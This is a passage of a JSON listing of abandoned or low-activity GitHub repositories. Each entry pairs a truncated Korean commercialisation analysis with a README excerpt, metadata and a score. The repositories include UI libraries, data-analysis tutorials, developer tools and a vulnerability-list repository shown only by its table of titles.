보물인가\n스마트폰 앱에서 사진이나 상품을 화려하게 원형으로 배열해주는 디자인 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 앱(SaaS)**: 온라인 쇼핑몰이 상품 이미지를 회전식으로 전시하는 프리미엄 기능으로 월 구독료 수징\n2. **소셜","readme_excerpt":"<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=garland-view-android\"><img src=\"https://github.com/Ramotion/folding-cell/blob/master/header.png\"></a>\n\n<a href=\"https://github.com/Ramotion/garland-view-android\">\n<img align=\"left\" src=\"https://github.com/Ramotion/garland-view-android/blob/master/preview.gif\" width=\"480\" height=\"360\" /></a>\n\n<p><h1 align=\"left\">GARLAND VIEW [JAVA]</h1></p>\n\n<h4>Garland View seamlessly transitions between multiple lists of content</h4>\n\n\n___\n\n\n<p><h6>We specialize in the designing and coding of custom UI for Mobile Apps and Websites.</h6>\n<a href=\"https://www.ramotion.com/agency/app-development/?utm_source=gthb&utm_medium=repo&utm_campaign=garland-view-android\">\n<img src=\"https://github.com/ramotion/gliding-collection/raw/master/contact_our_team@2x.png\" width=\"187\" height=\"34\"></a>\n</p>\n<p><h6>Stay tuned for the latest updates:</h6>\n<a href=\"https://goo.gl/rPFpid\" >\n<img src=\"https://i.imgur.com/ziSqeS","composite_score":0.5103,"license_safety_tag":"safe"},{"name":"zhouyanasd/or-pandas","github_url":"https://github.com/zhouyanasd/or-pandas","stars":11,"language":"Jupyter Notebook","license":"unknown","abandonment_months":56,"description":"# or-pandas 저장소 분석\n\n## 왜 보물인가\n데이터 분석 작업에서 복잡한 조건 검색을 간단하게 만들어주는 도구로, 엑셀이나 데이터베이스를 다루는 사람들의 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 데이터 분석 플랫폼에 내장하여 사용자가 쉽게 데이터를 필터링하고 검색할 수 있게 제공\n- *","readme_excerpt":"﻿# 【运筹OR帷幄|数据科学】pandas实战教程系列电子书\n\n本书是由【运筹OR帷幄】公众号旗下的数据科学社区共同创作和整理的开源电子书。\n\n本书的特点是简单易上手，每一章节都有相应的jupyter文件，可以直接放在带有jupyter notebook的python环境中运行。\n\n## 书籍目录\n预备章：[Jupyter简介](articles/Pandas%E6%95%99%E7%A8%8B_00%E5%A7%8B%E4%BA%8EJupyter%20Notebooks%EF%BC%9A%E4%B8%80%E4%BB%BD%E5%85%A8%E9%9D%A2%E7%9A%84%E5%88%9D%E5%AD%A6%E8%80%85%E5%AE%9E%E7%94%A8%E6%8C%87%E5%8D%97.md)\n\n第一章：[数据分析入门](articles/Pandas%E6%95%99%E7%A8%8B_01%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8.md)\n[(code)](code/pandas%E6%95%99%E7%A8%8B_01%E5%85%A5%E9%97%A8.ipynb)\n\n第二章：[数据导入与导出](articles/pandas%E6%95%99%E7%A8%8B_02%E6%95%B0%E6%8D%AE%E5%AF%BC%E5%85%A5%E4%B8%8E%E5%AF%BC%E5%87%BA.md)\n[(code)](code/pandas%E6%95%99%E7%A8%8B_02%E6%95%B0%E6%8D%AE%E5%AF%BC%E5%85%A5%E4%B8%8E%E5%AF%BC%E5%87%BA)\n\n第三章：[数据分组与聚合](articles/pandas%E6%95%99%E7%A8%8B_03%E5%88%86%E7%BB%84%E5%92%8C%E8%81%9A%E5%90%88.md)\n[(code)](code/pandas%E6%95%99%E7%A8%8B_03%E5%88%86%E7%BB%84%E4%B8%8E%E8%81%9A%E5%90%88.ipynb)\n\n第四章：[数据的索引、汇总和缺失处理](articles/pandas%E6%95","composite_score":0.5103,"license_safety_tag":"unknown"},{"name":"jwilber/roughViz","github_url":"https://github.com/jwilber/roughViz","stars":39,"language":"JavaScript","license":"MIT","abandonment_months":25,"description":"","readme_excerpt":"<img src=\"https://raw.githubusercontent.com/jwilber/random_data/master/roughViz_Title.png\"  width=\"350\" alt=\"roughViz.js\"><br>\n\n**roughViz.js** is a reusable JavaScript library for creating sketchy/hand-drawn styled charts in the browser, based on D3v5, roughjs, and handy.\n\n\n<img src=\"https://raw.githubusercontent.com/jwilber/random_data/master/roughViz.gif\" alt=\"roughViz.js\">\n\n\n### Why?\nUse these charts where the communication goal is to show intent or generality, and not absolute precision. Or just because they're fun and look weird.\n\n\n### Chart Types\n\n| Chart Type     | API                                                   |\n| -------------- | ----------------------------------------------------- |\n| Bar            | <a href=\"#roughvizbar\">roughViz.Bar</a>               |\n| Horizontal Bar | <a href=\"#roughvizbarh\">roughViz.BarH</a>             |\n| Donut          | <a href=\"#roughvizdonut\">roughViz.Donut</a>           |\n| Line           | <a href=\"#roughvizline\">roughViz.Line</a>    ","composite_score":0.5103,"license_safety_tag":"safe"},{"name":"perifacode/conteudo-gratuito","github_url":"https://github.com/perifacode/conteudo-gratuito","stars":5,"language":"","license":"unknown","abandonment_months":26,"description":"# perifacode/conteudo-gratuito 분석\n\n## 왜 보물인가\n브라질 저소득층을 위한 무료 코딩 교육 자료를 모아놓은 저장소로, 교육 불평등 해소라는 사회적 가치를 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼**: 비영리 온라인 교육 서비스에서 무료 강좌 콘텐츠로 활용\n2. **NGO 내부 도구**: 사회단체의 교육 프","readme_excerpt":"<!-- 📌 OLÁ, O READ.ME FICOU UM POUCO CONFUSO POR TER MUITAS INFORMAÇÕES ENTÃO ESTOU FAZENDO PEQUENOS COMENTÁRIOS PARA TE GUIAR UM POUCO!! -->\n\n<!-- 📌 ESTE PROJETO ESTÁ SENDO REFORMADO ENTÃO SE VOCÊ É UM COLABORADOR ANTIGO E SUA CONTRIBUIÇÃO NÃO ESTÁ AQUI, LOGO ELA SERA ADICIONADA, É UM PROCESSO UM POUCO DEMORADO, MAS ESTOU FAZENDO MEU MELHOR -->\n\n<!-- 📌 PARA FAZER CONTRIBUIÇÕES SUGIRO QUE SIGA O PADRÃO ATUAL DAS TABELAS, MAS SE TIVER UMA IDEIA PARA UMA NOVA TABELA OU ALGO DO GENERO, SUA IDEIA É\n SUPER BEM VINDA!!-->\n\n<!-- 📌 SUGIRO USAR O \"CTRL + F\" PARA SE LOCALIZAR NO READ ME COM MAIS FACILIDADE, APENAS PESQUISE PELO TITULO DA TABELA E ADICIONE SUA CONTRIBUIÇÃO -->\n\n<p align=\"center\">\n    <img src=\"/assets/perifaCode.png\" width=\"300px\" alt=\"perifaCode Logo\">\n</p>\n<div align=\"center\">\n    \n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-88-orange.svg?style=flat-square)](#contributors-)\n<!-- ","composite_score":0.5103,"license_safety_tag":"unknown"},{"name":"wasabeef/flutter-architecture-blueprints","github_url":"https://github.com/wasabeef/flutter-architecture-blueprints","stars":13,"language":"Dart","license":"MIT","abandonment_months":48,"description":"# flutter-architecture-blueprints 분석\n\n## 왜 보물인가\n스마트폰 앱 개발자들이 복잡한 구조를 쉽게 만들 수 있도록 미리 짜인 틀을 제공하는 템플릿 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 교육 플랫폼**: 신입 개발자 교육용 SaaS로, 올바른 앱 개발 방식을 배우는 강좌 판매\n2. **스타트업 개발팀 지원 도","readme_excerpt":"# Flutter Architecture Blueprints\n\n\n<p align=\"center\">\n  <img src=\"https://github.com/wasabeef/art/raw/master/flutter-architecture-blueprints/cover.png\" />\n</p>\n\n<p align=\"center\">\n  <a href=\"https://app.bitrise.io/app/bc96b48850888851\">\n    <img src=\"https://app.bitrise.io/app/bc96b48850888851/status.svg?token=kpOAmHRna6NiMkHYsosrlA\">\n  </a>\n  <a href=\"https://codemagic.io/apps/5f2fd2f0cfa9364ecb48c64e/5f2fd2f0cfa9364ecb48c64d/latest_build\">\n    <img src=\"https://api.codemagic.io/apps/5f2fd2f0cfa9364ecb48c64e/5f2fd2f0cfa9364ecb48c64d/status_badge.svg\">\n  </a>\n  <a href=\"https://github.com/wasabeef/flutter-architecture-blueprints/actions?query=workflow%3A%22Flutter+CI%22\">\n    <img src=\"https://github.com/wasabeef/flutter-architecture-blueprints/workflows/Flutter%20CI/badge.svg?branch=master\" />\n  </a>\n  <a href=\"https://codecov.io/gh/wasabeef/flutter-architecture-blueprints\">\n    <img src=\"https://codecov.io/gh/wasabeef/flutter-architecture-blueprints/branch/main/graph/badge.svg?token","composite_score":0.5103,"license_safety_tag":"safe"},{"name":"nxrighthere/UnrealCLR","github_url":"https://github.com/nxrighthere/UnrealCLR","stars":10,"language":"C#","license":"MIT","abandonment_months":36,"description":"# UnrealCLR 프로젝트 분석\n\n## 왜 보물인가\n언리얼 엔진이라는 고급 게임 개발 도구를 C#이라는 더 쉬운 프로그래밍 언어로 제어할 수 있게 만들어, 게임 개발의 진입장벽을 크게 낮춘 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 교육 플랫폼 (SaaS)**\n언리얼 엔진 초보자를 위한 온라인 강좌나 튜토리얼 플랫폼을 구독 형태로 ","readme_excerpt":"<p align=\"center\">\n\t<img src=\"https://i.imgur.com/c6Zn7SE.png\" alt=\"alt logo\">\n</p>\n\nUnrealCLR is a plugin which natively integrates .NET host into the Unreal Engine with the Common Language Runtime for direct execution of managed code to build a game/application logic using the full power of C# 10.0, F# 6.0, and .NET facilities with engine API. The project is aimed at stability, performance, and maintainability.\n\n[API reference](https://github.com/nxrighthere/UnrealCLR/blob/master/API/UnrealEngine-Framework.md) | [Manual](https://github.com/nxrighthere/UnrealCLR/blob/master/MANUAL.md) | [Code of Conduct](https://github.com/nxrighthere/UnrealCLR/blob/master/CODE_OF_CONDUCT.md) | [Community](https://github.com/nxrighthere/UnrealCLR/discussions) | [Roadmap](https://github.com/users/nxrighthere/projects/5?fullscreen=true) | [Contact](mailto:nxrighthere@gmail.com)\n\nFeatures:\n\n- Host loading, integration, and management during the lifetime of the engine\n- Dynamic loading, unloading, isolati","composite_score":0.5102,"license_safety_tag":"safe"},{"name":"blaisewang/img2latex-mathpix","github_url":"https://github.com/blaisewang/img2latex-mathpix","stars":88,"language":"Java","license":"Apache-2.0","abandonment_months":65,"description":"","readme_excerpt":"# Image2LaTeX\n\nEnglish | [中文](https://github.com/blaisewang/img2latex-mathpix/blob/master/README-ZH.md#readme)\n\n[![Codacy Badge](https://img.shields.io/codacy/grade/89cd8aa01451404f8d782ead0b4d153d?logo=codacy&style=flat-square)](https://www.codacy.com/manual/blaisewang/img2latex-mathpix)\n[![Build Status](https://img.shields.io/travis/com/blaisewang/img2latex-mathpix/master?logo=travis&style=flat-square)](https://travis-ci.com/blaisewang/img2latex-mathpix)\n[![Releases](https://img.shields.io/github/v/release/blaisewang/img2latex-mathpix?include_prereleases&style=flat-square)](https://github.com/blaisewang/img2latex-mathpix/releases)\n[![Downloads](https://img.shields.io/github/downloads/blaisewang/img2latex-mathpix/total?style=flat-square)](https://github.com/blaisewang/img2latex-mathpix/releases)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?color=ff69b4&style=flat-square)](http://makeapullrequest.com)\n[![License](https://img.shields.io/github/license/blaisew","composite_score":0.5101,"license_safety_tag":"safe"},{"name":"DDoSolitary/LxRunOffline","github_url":"https://github.com/DDoSolitary/LxRunOffline","stars":5,"language":"C++","license":"MIT","abandonment_months":52,"description":"# LxRunOffline 분석 보고서\n\n## 왜 보물인가\nWindows에서 리눅스 환경을 간편하게 실행할 수 있는 도구로, 개발자와 기술팀이 복잡한 설정 없이 다양한 환경에서 작업할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 개발 환경 제공 플랫폼으로, 사용자들이 웹 브라우저에서 리눅스 환경을 직접 구성할 수 있","readme_excerpt":"# LxRunOffline\r\n\r\n![Build status](https://github.com/DDoSolitary/LxRunOffline/workflows/.github/workflows/build.yml/badge.svg)\r\n[![Chocolatey](https://img.shields.io/chocolatey/v/lxrunoffline.svg)](https://chocolatey.org/packages/lxrunoffline)\r\n\r\nA full-featured utility for managing *Windows Subsystem for Linux (WSL)*.\r\n\r\n# Donation\r\n\r\nIt would be greatly appreciated if you could make a donation to support development of this project.\r\n\r\nPayPal [![](https://www.paypalobjects.com/en_US/i/btn/btn_donate_LG.gif)](https://www.paypal.me/ddosolitary)\r\n\r\nAlipay\r\n\r\n![Alipay](https://image.ibb.co/kkxV99/1537608529099_20180922174914623.jpg)\r\n\r\n# Features\r\n\r\n- Install any Linux distro to any directory on your computer.\r\n- Move an existing installation to another directory.\r\n- Duplicate(copy) an existing installation.\r\n- Register an existing installation directory. This enables you to install to a USB stick and use it on different computers.\r\n- Run arbitrary Linux commands in a specified installat","composite_score":0.5101,"license_safety_tag":"safe"},{"name":"HelloChenJinJun/NewFastFrame","github_url":"https://github.com/HelloChenJinJun/NewFastFrame","stars":39,"language":"Java","license":"Apache-2.0","abandonment_months":66,"description":"# NewFastFrame 상용화 분석 보고서\n\n## 왜 보물인가\n안드로이드 앱 개발을 빠르고 쉽게 만들 수 있는 기본 틀을 제공하여, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 개발사에 \"앱 개발 템플릿 구독 서비스\"로 제공하여 개발 기간을 40% 단축하도록 지원\n2. **내부 업무 도구**: 기","readme_excerpt":"\n# 组件化框架项目\n\n\n## 简介\n该项目目前集成现在主流的开发框架和技术，包括okhttp、rxjava、retrofit、glide、greendao、dagger、mvp、md风格、皮肤插件、热修复tinker,bugly、友盟数据统计和组件化等。\n\n采用组件化开发框架，可以使模块单独编译调试，可以有效地减少编译的时间，更好地进行并发开发，从而极大的提高了并行开发效率。\n\n\n\n## 项目详解地址为\n\nhttps://juejin.im/entry/5a1cca70f265da432652923f\n\nhttp://www.jianshu.com/p/e6eb9c8d120f\n\nhttps://juejin.im/post/5c2d8fe46fb9a049c30b5d4b\n\n## 本次更新内容(2019-1-3)：\n#### 1.内部更新编译SDK版本到28.0.0，google的support库迁移到androidx；\n#### 2.在线下载皮肤插件，无需重启更新全局。\n#### 3.基类库集成字体库、友盟页面数据统计、bugly（bug监控、升级和热修复）等功能。\n#### 4.改版音乐模块，功能界面简洁优美。\n#### 5.新增vip电影模块，数据来源于腾讯视频接口以及网上的vip视频解析接口。\n#### 6.改版帖子发布UI界面，包括纯文本、图文、视频等格式，界面类似于微博。\n#### 7.改版聊天界面，新增聊天背景图，完善UI细节。\n#### 8.基类库添加今日头条适配方案。只需要在基类库中填写相应的设计图尺寸便可，亲测在公司项目上已适配成功，适配成本低。\n#### 9.改版图片浏览界面，滑动渐隐删除、并伴随共享动画效果，效果类似于微信朋友圈。\n#### 10.评论界面、帖子展示界面、个人中心界面等添加共享动画效果。\n#### 11.新增系统反馈和关于界面。\n#### 12.基类库新增保活Service基类，（包括目前比较主流的保活策略，如：JobService、onStartCommend返回Sticky，onDestroy重新创建，一像素activity保活、系统广播保活、系统漏洞startForeground等）\n#### 13.基类库新增音乐播放和视频播放管理类。\n#### 14.各个三方库基本上更新到最新版本，主要是为了与androidx进行","composite_score":0.5101,"license_safety_tag":"safe"},{"name":"httpvoid/writeups","github_url":"https://github.com/httpvoid/writeups","stars":154,"language":"","license":"unknown","abandonment_months":45,"description":"# httpvoid/writeups 분석 보고서\n\n## 왜 보물인가\n보안 전문가들이 실제 해킹 사례를 분석한 교육 자료 모음으로, 사이버 보안 학습의 실전 교과서 역할을 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원을 위한 보안 교육 플랫폼으로 제공\n- **내부 업무 도구**: 보안팀의 사건 분석 및 대응 매뉴얼 데이터베이스 구","readme_excerpt":"","composite_score":0.51,"license_safety_tag":"unknown"},{"name":"jasminmif/react-interactive-paycard","github_url":"https://github.com/jasminmif/react-interactive-paycard","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":31,"description":"# React Interactive Paycard 분석\n\n## 왜 보물인가\n신용카드 결제 화면을 웹사이트에 직접 만들 수 있게 해주는 실용적인 도구로, 온라인 결제 서비스를 운영하는 사람들이 필요로 하는 기능입니다.\n\n## 어디에 쓸 수 있나\n\n1. **전자상거래 플랫폼**: 쇼핑몰이나 구독 서비스에 직접 통합하여 고객이 카드 정보를 입력할 때 예쁜 인터페","readme_excerpt":"# react-interactive-paycard\n\nInspired from a vue project [vue-interactive-paycard](https://github.com/muhammederdem/vue-interactive-paycard), I decided to recreate the same on React as a part time fun project.\nI did some minor changes on the animations and optimizations on the code.\n\nA fantastic credit card form with smooth and sweet micro-interactions. Includes number formatting, validation and automatic card type detection. Built with reactjs and also fully responsive\n\n### Demo\n[https://codesandbox.io/s/github/jasminmif/react-interactive-paycard/tree/master/?fontsize=14&hidenavigation=1&theme=dark](https://codesandbox.io/s/github/jasminmif/react-interactive-paycard/tree/master/?fontsize=14&hidenavigation=1&theme=dark)\n![](demo.gif)\n\n\n## Libraries used\n\n-   [react](https://github.com/facebook/react)\n-   [react-transition-group](https://github.com/reactjs/react-transition-group)\n\n## Available Scripts\n\nIn the project directory, you can run:\n\n### `npm install`\n\nInstalls all the required ","composite_score":0.51,"license_safety_tag":"safe"},{"name":"frontity/frontity","github_url":"https://github.com/frontity/frontity","stars":6,"language":"TypeScript","license":"Apache-2.0","abandonment_months":38,"description":"# Frontity 저장소 분석\n\n## 왜 보물인가\n블로그나 뉴스 사이트를 빠르고 쉽게 만들 수 있는 기술이라 웹사이트 제작 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **미디어 회사의 뉴스 사이트 구축 서비스**: 신문사나 잡지사가 고객 맞춤형 뉴스 플랫폼을 빠르게 런칭할 수 있는 SaaS\n2. **개인 블로거용 웹사이트 빌더*","readme_excerpt":"## 📣 Frontity Framework is not actively maintained! \n\n> Frontity Framework is **not** under active development anymore. Pull requests and issues are not being actively reviewed. For more details, please see the [blog post](https://frontity.org/blog/frontity-is-joining-automattic/).\n> \n> The team is now working on [**the WordPress Interactivity API**](https://make.wordpress.org/core/2023/03/30/proposal-the-interactivity-api-a-better-developer-experience-in-building-interactive-blocks/). This will unblock the same UX Frontity framework enabled but directly in WordPress Core, fully compatible with the new Site Editor.\n>\n> If you are **interested in becoming a maintainer and continuing the development of the framework** please do get in touch with one of the developers or let us know in [this community thread](https://community.frontity.org/t/frontity-framework-is-looking-for-maintainers/6178).\n>\n> Thanks!\n\n<br>\n\n<br>\n<div align=\"center\">\n  <a href=\"https://frontity.org/\">\n  <img src=\"http","composite_score":0.51,"license_safety_tag":"safe"},{"name":"microsoft/NUWA","github_url":"https://github.com/microsoft/NUWA","stars":169,"language":"","license":"unknown","abandonment_months":36,"description":"# NUWA 프로젝트 분석\n\n## 왜 보물인가\n마이크로소프트가 개발한 이 프로젝트는 이미지, 영상, 텍스트를 함께 이해하고 생성하는 인공지능 기술로, 현재 많은 회사들이 필요로 하는 핵심 역량입니다.\n\n## 어디에 쓸 수 있나\n\n1. **콘텐츠 자동 생성 SaaS**: 마케팅팀이 텍스트 설명만 입력하면 자동으로 광고용 이미지와 영상을 만들어주는 서비스\n2.","readme_excerpt":"This is the official repo for the following papers: \n \n+ [NÜWA: Visual Synthesis Pre-training for Neural visUal World creAtion](https://arxiv.org/abs/2111.12417). (ECCV 2022)\n\n+ [NUWA-Infinity: Autoregressive over Autoregressive Generation for Infinite Visual Synthesis](https://arxiv.org/abs/2207.09814). (NeurIPS 2022)\n\n+ [NUWA-LIP: Language Guided Image Inpainting with Defect-free VQGAN](https://arxiv.org/abs/2202.05009). (CVPR 2023)\n\n+ [Learning 3D Photography Videos via Self-supervised Diffusion on Single Images](https://arxiv.org/abs/2302.10781). (IJCAI 2023)\n\n+ [NUWA-XL: Diffusion over Diffusion for eXtremely Long Video Generation](https://arxiv.org/abs/2303.12346). (ACL 2023)\n\n\n## Update 2022/7/13: [NUWA-Infinity](NUWAInfinity.md)\n[\\[Project page\\]](https://nuwa-infinity.microsoft.com/#/) [\\[Paper\\]](https://arxiv.org/abs/2207.09814) \n\n[NUWA-Infinity](NUWAInfinity.md) is a generative model for infinite visual synthesis, which is defined as the task of generating arbitrarily-sized","composite_score":0.5099,"license_safety_tag":"unknown"},{"name":"GoogleCloudPlatform/container-diff","github_url":"https://github.com/GoogleCloudPlatform/container-diff","stars":32,"language":"Go","license":"Apache-2.0","abandonment_months":26,"description":"# Container-Diff 상용화 분석\n\n## 왜 보물인가\nGoogle이 만든 공식 도구로, 컨테이너(프로그램을 담는 상자 같은 것) 간의 차이를 자동으로 찾아주어 소프트웨어 업데이트 관리를 획기적으로 단순화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 배포 관리 플랫폼에서 \"이전 버전과 뭐가 달라졌는가\"를 자동으로","readme_excerpt":"\nThis project is archived. \n- If you wish to continue maintaining it, you may fork and continue development on that fork.\n- If you are looking for an alternative, try [diffoci](https://github.com/reproducible-containers/diffoci)\n\n[![Build\nStatus](https://travis-ci.org/GoogleContainerTools/container-diff.svg?branch=master)](https://travis-ci.org/GoogleContainerTools/container-diff)\n\n## What is container-diff?\n\ncontainer-diff is a tool for analyzing and comparing container images. container-diff can examine images along several different criteria, including:\n- Docker Image History\n- Image file system\n- Image size\n- Apt packages\n- RPM packages\n- pip packages\n- npm packages\n\nThese analyses can be performed on a single image, or a diff can be performed on two images to compare. The tool can help users better understand what is changing inside their images, and give them a better look at what their images contain.\n\n**NOTE: container-diff is a Google project, but is not currently being offici","composite_score":0.5099,"license_safety_tag":"safe"},{"name":"hi-dhl/PokemonGo","github_url":"https://github.com/hi-dhl/PokemonGo","stars":5,"language":"Kotlin","license":"unknown","abandonment_months":65,"description":"# PokemonGo 저장소 분석\n\n## 왜 보물인가\n포켓몬GO 게임의 위치 정보와 게임 데이터를 활용한 프로젝트로, 게임 기반 위치 서비스 기술을 상용화할 수 있는 기초가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임사 데이터 분석 도구**: 포켓몬GO 플레이어의 행동 패턴과 위치 데이터를 분석하는 SaaS로 게임 마케팅팀에 판매\n2. **위","readme_excerpt":"# <p align=\"center\"> PokemonGo <img src='http://cdn.51git.cn/2020-07-15-34.png'></p>\n\n<p align=\"center\"> 神奇宝贝 (PokemonGo) 基于 Jetpack + MVVM + Repository + Paging3 + Kotlin Flow 的实战项目 </p>\n\n<p align=\"center\">\n这是一个小型的 App 项目，涉及到技术：Paging3（network + db），Dagger-Hilt，App Startup，DataBinding，Room，Motionlayout，Kotlin Flow，Coil，JProgressView 等等。\n</p>\n\n<p align=\"center\">\n  \n  <a title=\"GitHub Stars\" target=\"_blank\" href=\"https://github.com/hi-dhl/PokemonGo/stargazers\">\n  <img alt=\"GitHub Stars\" src=\"https://img.shields.io/github/stars/hi-dhl/PokemonGo.svg?label=Stars&style=social\">\n  </a>  \n  \n  <a title=\"GitHub Forks\" target=\"_blank\" href=\"https://github.com/hi-dhl/PokemonGo/network/members\">\n  <img alt=\"GitHub Forks\" src=\"https://img.shields.io/github/forks/hi-dhl/PokemonGo.svg?label=Forks&style=social\">\n  </a>\n  \n</p>\n\n<p align=\"center\">\n<a href=\"https://github.com/hi-dhl\"><img src=\"https://img.shields.io/badge/GitHub-HiDhl-4BC51D.svg?style=flat\"></a> <a href=\"https://opensource.org/licenses","composite_score":0.5099,"license_safety_tag":"unknown"},{"name":"uber/pyflame","github_url":"https://github.com/uber/pyflame","stars":11,"language":"C++","license":"Apache-2.0","abandonment_months":79,"description":"# Uber Pyflame 분석\n\n## 왜 보물인가\n프로그램이 느려지는 원인을 자동으로 찾아주는 도구로, 소프트웨어 성능 최적화에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 애플리케이션 속도 진단 및 최적화 자동화 서비스\n- **내부 업무 도구**: 개발팀이 자신들의 코드 성능을 모니터링하고 병목 지점을 파악하는 플랫폼","readme_excerpt":"# Pyflame: A Ptracing Profiler For Python\n\n[![Build Status](https://api.travis-ci.org/uber/pyflame.svg?branch=master)](https://travis-ci.org/uber/pyflame) [![Docs Status](https://readthedocs.org/projects/pyflame/badge/?version=latest)](http://pyflame.readthedocs.io/en/latest/?badge=latest) [![COPR Status](https://copr.fedorainfracloud.org/coprs/eklitzke/pyflame/package/pyflame/status_image/last_build.png)](https://copr.fedorainfracloud.org/coprs/eklitzke/pyflame/)\n\n(This project is deprecated and not maintained.)\n\nPyflame is a high performance profiling tool that\ngenerates [flame graphs](http://www.brendangregg.com/flamegraphs.html) for\nPython. Pyflame is implemented in C++, and uses the\nLinux [ptrace(2)](http://man7.org/linux/man-pages/man2/ptrace.2.html) system\ncall to collect profiling information. It can take snapshots of the Python call\nstack without explicit instrumentation, meaning you can profile a program\nwithout modifying its source code. Pyflame is capable of profiling embed","composite_score":0.5098,"license_safety_tag":"safe"},{"name":"bytedance/flutter_ume","github_url":"https://github.com/bytedance/flutter_ume","stars":5,"language":"Dart","license":"MIT","abandonment_months":28,"description":"# ByteDance Flutter UME 분석\n\n## 왜 보물인가\n휴대폰 앱 개발자들이 개발 중에 앱의 문제를 빠르게 찾고 고칠 수 있게 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발사 내부 도구**: 개발팀이 버그를 찾기 위해 구독하는 고급 디버깅 플랫폼\n2. **앱 개발 교육 서비스**: 프로그래밍 학원이나 온라인 코스에서 학생들에","readme_excerpt":"# flutter_ume\n\n[简体中文](./README_cn.md)\n\nUME is an in-app debug kits platform for Flutter apps.\n\n[![platforms](https://img.shields.io/badge/platforms-ios%20%7C%20android%20%7C%20web%20%7C%20macos%20%7C%20windows%20%7C%20linux-lightgrey)](https://pub.dev/packages/flutter_ume) [![license](https://img.shields.io/github/license/bytedance/flutter_ume.svg)](https://github.com/bytedance/flutter_ume/blob/master/LICENSE)\n\n[![pub package](https://img.shields.io/pub/v/flutter_ume.svg)](https://pub.dev/packages/flutter_ume)\n[![pub package](https://img.shields.io/pub/likes/flutter_ume.svg)](https://pub.dev/packages/flutter_ume)\n[![pub package](https://img.shields.io/pub/points/flutter_ume.svg)](https://pub.dev/packages/flutter_ume)\n[![pub package](https://img.shields.io/pub/popularity/flutter_ume.svg)](https://pub.dev/packages/flutter_ume)\n[![pub package](https://img.shields.io/pub/publisher/flutter_ume.svg)](https://pub.dev/packages/flutter_ume)\n\n**Since `^1.0.0`, flutter_ume starts adapting to the ","composite_score":0.5098,"license_safety_tag":"safe"},{"name":"YinWC/2021hvv_vul","github_url":"https://github.com/YinWC/2021hvv_vul","stars":6,"language":"Python","license":"unknown","abandonment_months":62,"description":"# 2021hvv_vul 저장소 분석\n\n## 왜 보물인가\n2021년에 발견된 보안 취약점들을 정리한 자료로, 기업의 시스템 보안 점검이나 교육 자료로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 컨설팅 SaaS**: 자동 취약점 스캔 서비스에 이 데이터를 활용해 고객사 시스템 문제점 진단\n2. **보안 교육 플랫폼**: IT 담당자나","readme_excerpt":"# 清单\n|     |     |     |\n| --- | --- | --- |\n| 披露时间 | 涉及商家/产品 | 漏洞描述 |\n| 2021/04/08 | 启明星辰天清汉马USG防火墙存在逻辑缺陷漏洞（历史漏洞） | CNVD-2021-17391 [启明星辰 天清汉马USG防火墙 逻辑缺陷漏洞 CNVD-2021-12793](#root/9qkX6frCsu3x/DOZw83AbKCdo/zLpgwEgVPOgs/w1AmhI8ibYAj/64UQYbMnCr1j) |\n| 2021/04/08 | 禅道项目管理软件11.6 | [禅道 11.6 sql注入漏洞](0409/%E7%A6%85%E9%81%93%2011.6%20sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md) |\n| 2021/04/08 | 金山WPS（历史漏洞CVE-2020-25291） | 通过点击触发WPS内置浏览器RCE [金山WPS存在远程堆损坏漏洞](0410/%E9%87%91%E5%B1%B1WPS%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%A0%86%E6%8D%9F%E5%9D%8F%E6%BC%8F%E6%B4%9E) |\n| 2021/04/08 | 金山V8/V9终端安全系统 | [金山 V8 -V9 终端安全系统漏洞合集](0419/%E9%87%91%E5%B1%B1%20V8%20-V9%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86.md) |\n| 2021/04/08 | 金山V8终端安全系统 | [金山 V8 终端安全系统 pdf\\_maker.php 命令执行漏洞](#root/9qkX6frCsu3x/DOZw83AbKCdo/KRA6mYjz1mY3/aiBOhoE669yU/2Xfm1HqKqIHo) |\n| 2021/04/08 | 天擎  | [天擎越权访问](0408/%E5%A4%A9%E6%93%8E%E8%B6%8A%E6%9D%83%E8%AE%BF%E9%97%AE.md) |\n| 2021/04/08 ","composite_score":0.5096,"license_safety_tag":"unknown"},{"name":"fireship-io/gun-chat","github_url":"https://github.com/fireship-io/gun-chat","stars":39,"language":"JavaScript","license":"unknown","abandonment_months":26,"description":"# Gun-Chat 저장소 분석\n\n## 왜 보물인가\n중앙 서버 없이 사람들끼리 직접 메시지를 주고받을 수 있는 채팅 앱으로, 개인정보 보호가 중요한 시대에 안전한 통신 수단을 원하는 사용자들이 찾는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **개인정보 보호 채팅 SaaS**: 기업의 기밀 협상이나 민감한 정보 공유가 필요한 팀들을 위한 보안 메신저 서","readme_excerpt":"# GUN Chat Dapp Demo\n\nA decentralized chat app built with [GUN](https://gun.eco/). \n\n- Try the 